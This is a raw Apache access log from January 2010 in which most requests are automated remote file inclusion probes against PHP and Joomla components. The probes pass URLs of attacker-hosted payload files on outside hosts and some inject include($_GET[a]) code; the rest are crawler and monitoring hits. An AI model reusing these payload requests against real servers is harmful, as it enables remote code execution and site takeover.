81.2.201.96 - - [04/Jan/2010:00:00:08 -0500] "GET /logs/access_log.Q109080900//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:00:34 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:00:34 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:00:34 -0500] "GET /logs/access_log.Q109111400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
95.108.128.242 - - [03/Jan/2010:23:59:58 -0500] "GET /logs/access_log.Q109051200 HTTP/1.1" 200 6040641 "-" "Yandex/1.01.001 (compatible; Win16; I)"
81.2.201.96 - - [04/Jan/2010:00:00:55 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:00:55 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:00:57 -0500] "GET /logs/access_log.Q109111400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:01:03 -0500] "GET /logs/access_log.Q109080900//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:01:05 -0500] "GET /logs/access_log.Q109072900//main.php?sayfa=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:01:08 -0500] "GET /logs/access_log.Q109080900//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:01:14 -0500] "GET /logs/access_log.Q109072900//main.php?sayfa=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:01:26 -0500] "GET /logs/access_log.Q109072900//main.php?sayfa=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Jan/2010:00:01:51 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
81.2.201.96 - - [04/Jan/2010:00:02:04 -0500] "GET /logs/access_log.Q109100700%20%20//main.php?sayfa=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:02:34 -0500] "GET /logs/access_log.Q109072900%20%20//main.php?sayfa=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:03:41 -0500] "GET /logs/access_log.Q109100700%20%20//main.php?sayfa=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:04:00 -0500] "GET /logs/access_log.Q109100700%20%20//main.php?sayfa=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:04:09 -0500] "GET /logs/access_log.Q109072900%20%20//main.php?sayfa=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:04:42 -0500] "GET /logs/access_log.Q109072900%20%20//main.php?sayfa=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
114.108.177.220 - - [04/Jan/2010:00:05:29 -0500] "GET /logs/access_log.Q109102600//include/mail.inc.php?skin_board_path=http://dbcc.co.kr//bbs/icon/1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
114.108.177.220 - - [04/Jan/2010:00:05:29 -0500] "GET /logs/error_log.Q109102600//include/mail.inc.php?skin_board_path=http://dbcc.co.kr//bbs/icon/1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
114.108.177.220 - - [04/Jan/2010:00:05:29 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://dbcc.co.kr//bbs/icon/1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
61.47.7.71 - - [04/Jan/2010:00:06:05 -0500] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
61.47.7.71 - - [04/Jan/2010:00:06:05 -0500] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
61.47.7.71 - - [04/Jan/2010:00:06:05 -0500] "GET /logs/access_log.Q109112500%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
61.47.7.71 - - [04/Jan/2010:00:06:26 -0500] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
61.47.7.71 - - [04/Jan/2010:00:06:26 -0500] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
61.47.7.71 - - [04/Jan/2010:00:06:26 -0500] "GET /logs/access_log.Q109112500%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Jan/2010:00:06:56 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
81.2.201.96 - - [04/Jan/2010:00:07:29 -0500] "GET /?DOCUMENT_ROOT=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:07:29 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 200 32774 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:07:30 -0500] "GET /logs/access_log.Q109110100/?DOCUMENT_ROOT=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:08:19 -0500] "GET /logs/access_log.Q109111400%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:08:27 -0500] "GET /logs/access_log.Q109111400%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:08:27 -0500] "GET /logs/access_log.Q109080900%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:08:28 -0500] "GET /logs/access_log.Q109080900%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:08:38 -0500] "GET /logs/access_log.Q109110100/?DOCUMENT_ROOT=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:08:38 -0500] "GET /?DOCUMENT_ROOT=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:08:38 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 200 32774 "-" "Mozilla/5.0"
66.249.65.49 - - [04/Jan/2010:00:08:56 -0500] "GET /images/items/2PC_KIT_THUMB.JPG HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
81.2.201.96 - - [04/Jan/2010:00:09:06 -0500] "GET /logs/access_log.Q109111400%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:09:10 -0500] "GET /logs/access_log.Q109080900%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
66.249.65.49 - - [04/Jan/2010:00:09:14 -0500] "GET /images/Office%20Supply/space.gif HTTP/1.1" 200 43 "-" "Googlebot-Image/1.0"
95.108.128.242 - - [04/Jan/2010:00:09:19 -0500] "GET /logs/error_log.Q109073100 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
61.47.7.71 - - [04/Jan/2010:00:10:19 -0500] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
61.47.7.71 - - [04/Jan/2010:00:10:19 -0500] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
61.47.7.71 - - [04/Jan/2010:00:10:19 -0500] "GET /logs/access_log.Q109091700/components/com_performs/performs.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
61.47.7.71 - - [04/Jan/2010:00:10:19 -0500] "GET /logs/access_log.Q109070700/components/com_performs/performs.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Jan/2010:00:11:52 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.87.192.182 - - [04/Jan/2010:00:14:04 -0500] "GET /logs/index.php?conteudo=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
77.87.192.182 - - [04/Jan/2010:00:14:04 -0500] "GET /index.php?conteudo=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
77.87.192.182 - - [04/Jan/2010:00:14:04 -0500] "GET /logs/error_log.Q109052200/index.php?conteudo=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
61.47.7.71 - - [04/Jan/2010:00:14:22 -0500] "GET /logs/access_log.Q109070700%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
61.47.7.71 - - [04/Jan/2010:00:14:44 -0500] "GET /logs/access_log.Q109091700/components/com_performs/performs.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
61.47.7.71 - - [04/Jan/2010:00:14:44 -0500] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
61.47.7.71 - - [04/Jan/2010:00:14:44 -0500] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
61.47.7.71 - - [04/Jan/2010:00:14:44 -0500] "GET /logs/access_log.Q109070700/components/com_performs/performs.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
61.47.7.71 - - [04/Jan/2010:00:14:48 -0500] "GET /logs/access_log.Q109091700%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
66.249.65.49 - - [04/Jan/2010:00:14:52 -0500] "GET /images/items/EcOm/ HTTP/1.1" 200 2245 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [04/Jan/2010:00:16:52 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
95.108.128.242 - - [04/Jan/2010:00:18:02 -0500] "GET /logs/error_log.Q109072700 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
210.205.6.233 - - [04/Jan/2010:00:18:44 -0500] "GET //amboard/bbs.php?=http://cemerlangclean.com/byz9991.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
210.205.6.233 - - [04/Jan/2010:00:18:44 -0500] "GET /logs//amboard/bbs.php?=http://cemerlangclean.com/byz9991.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
210.205.6.233 - - [04/Jan/2010:00:18:50 -0500] "GET /logs/access_log.Q109071600//amboard/bbs.php?=http://cemerlangclean.com/byz9991.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
61.47.7.71 - - [04/Jan/2010:00:18:57 -0500] "GET /logs/access_log.Q109070700%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
61.47.7.71 - - [04/Jan/2010:00:19:16 -0500] "GET /logs/access_log.Q109091700%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:20:14 -0500] "GET /logs/access_log.Q109101000%20%20//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:20:14 -0500] "GET //components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:20:14 -0500] "GET /logs//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:20:20 -0500] "GET //components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:20:20 -0500] "GET /logs/access_log.Q109101000//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:20:22 -0500] "GET /logs//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:20:24 -0500] "GET //components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:20:24 -0500] "GET /logs/access_log.Q109101000//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:20:25 -0500] "GET /logs//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:20:30 -0500] "GET /logs//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:20:30 -0500] "GET /logs/access_log.Q109101000%20%20//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:20:30 -0500] "GET //components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:20:54 -0500] "GET /logs//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:20:54 -0500] "GET //components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:20:56 -0500] "GET /logs/access_log.Q109101000//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:21:03 -0500] "GET //components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:21:03 -0500] "GET /logs//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:21:05 -0500] "GET /logs/access_log.Q109101000%20%20//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.eduhy.or.kr/~gifted/bbs/list/heheh.txt?%20? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Jan/2010:00:21:57 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.151.247.1 - - [04/Jan/2010:00:23:15 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
64.151.247.1 - - [04/Jan/2010:00:23:15 -0500] "GET /logs/access_log.Q109090800//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
64.151.247.1 - - [04/Jan/2010:00:23:15 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
67.195.114.54 - - [04/Jan/2010:00:25:33 -0500] "GET /logs/error_log.Q109101500 HTTP/1.0" 200 3785191 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
64.151.247.1 - - [04/Jan/2010:00:25:43 -0500] "GET /logs/access_log.Q109090800%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
64.151.247.1 - - [04/Jan/2010:00:25:50 -0500] "GET /logs/access_log.Q109081000%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
67.195.114.54 - - [04/Jan/2010:00:25:33 -0500] "GET /logs/error_log.Q109101500 HTTP/1.0" 200 3785191 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
95.108.128.242 - - [04/Jan/2010:00:26:45 -0500] "GET /logs/error_log.Q109100400 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
209.59.12.99 - - [04/Jan/2010:00:27:06 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.38.16.181 - - [04/Jan/2010:00:29:25 -0500] "GET /id='' HTTP/1.1" 404 203 "-" "libwww-perl/5.79"
188.93.208.12 - - [04/Jan/2010:00:29:31 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.company-car-log.com/media/.id2??? HTTP/1.1" 200 454 "-" "libwww-perl/5.805"
209.172.33.230 - - [04/Jan/2010:00:30:46 -0500] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.westchesterinvisalign.com/icon/baner.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
209.172.33.230 - - [04/Jan/2010:00:30:46 -0500] "GET /logs/access_log.Q109063000//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.westchesterinvisalign.com/icon/baner.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
209.172.33.230 - - [04/Jan/2010:00:30:46 -0500] "GET //xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.westchesterinvisalign.com/icon/baner.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
209.172.33.230 - - [04/Jan/2010:00:30:51 -0500] "GET /logs/access_log.Q109080500//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.westchesterinvisalign.com/icon/baner.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
78.110.50.121 - - [04/Jan/2010:00:31:02 -0500] "GET /logs/access_log.Q109101500//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
78.110.50.121 - - [04/Jan/2010:00:31:02 -0500] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
78.110.50.121 - - [04/Jan/2010:00:31:02 -0500] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
78.110.50.121 - - [04/Jan/2010:00:31:02 -0500] "GET /logs/access_log.Q109101500//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
78.110.50.121 - - [04/Jan/2010:00:31:02 -0500] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
78.110.50.121 - - [04/Jan/2010:00:31:03 -0500] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
78.110.50.121 - - [04/Jan/2010:00:31:03 -0500] "GET /logs/access_log.Q109112100//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
78.110.50.121 - - [04/Jan/2010:00:31:03 -0500] "GET /logs/access_log.Q109112100//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
78.110.50.121 - - [04/Jan/2010:00:31:13 -0500] "GET /logs/access_log.Q109101500%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
78.110.50.121 - - [04/Jan/2010:00:31:13 -0500] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
78.110.50.121 - - [04/Jan/2010:00:31:13 -0500] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
78.110.50.121 - - [04/Jan/2010:00:31:13 -0500] "GET /logs/access_log.Q109112100%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
78.110.50.121 - - [04/Jan/2010:00:31:15 -0500] "GET /logs/access_log.Q109101500%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
78.110.50.121 - - [04/Jan/2010:00:31:15 -0500] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
78.110.50.121 - - [04/Jan/2010:00:31:15 -0500] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
